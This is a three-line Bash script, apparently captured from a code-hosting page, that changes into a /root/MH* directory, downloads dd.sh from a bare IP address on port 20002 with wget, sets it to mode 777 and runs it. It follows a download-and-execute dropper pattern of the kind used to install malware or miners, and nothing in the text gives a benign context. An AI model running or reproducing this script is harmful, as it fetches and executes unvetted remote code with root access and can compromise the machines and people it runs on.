3 lines
98 B
Bash
3 lines
98 B
Bash
#!/bin/bash
|
|
cd /root/MH*
|
|
wget http://5.188.158.106:20002/dd.sh -O dd.sh;chmod -R 777 dd.sh;./dd.sh |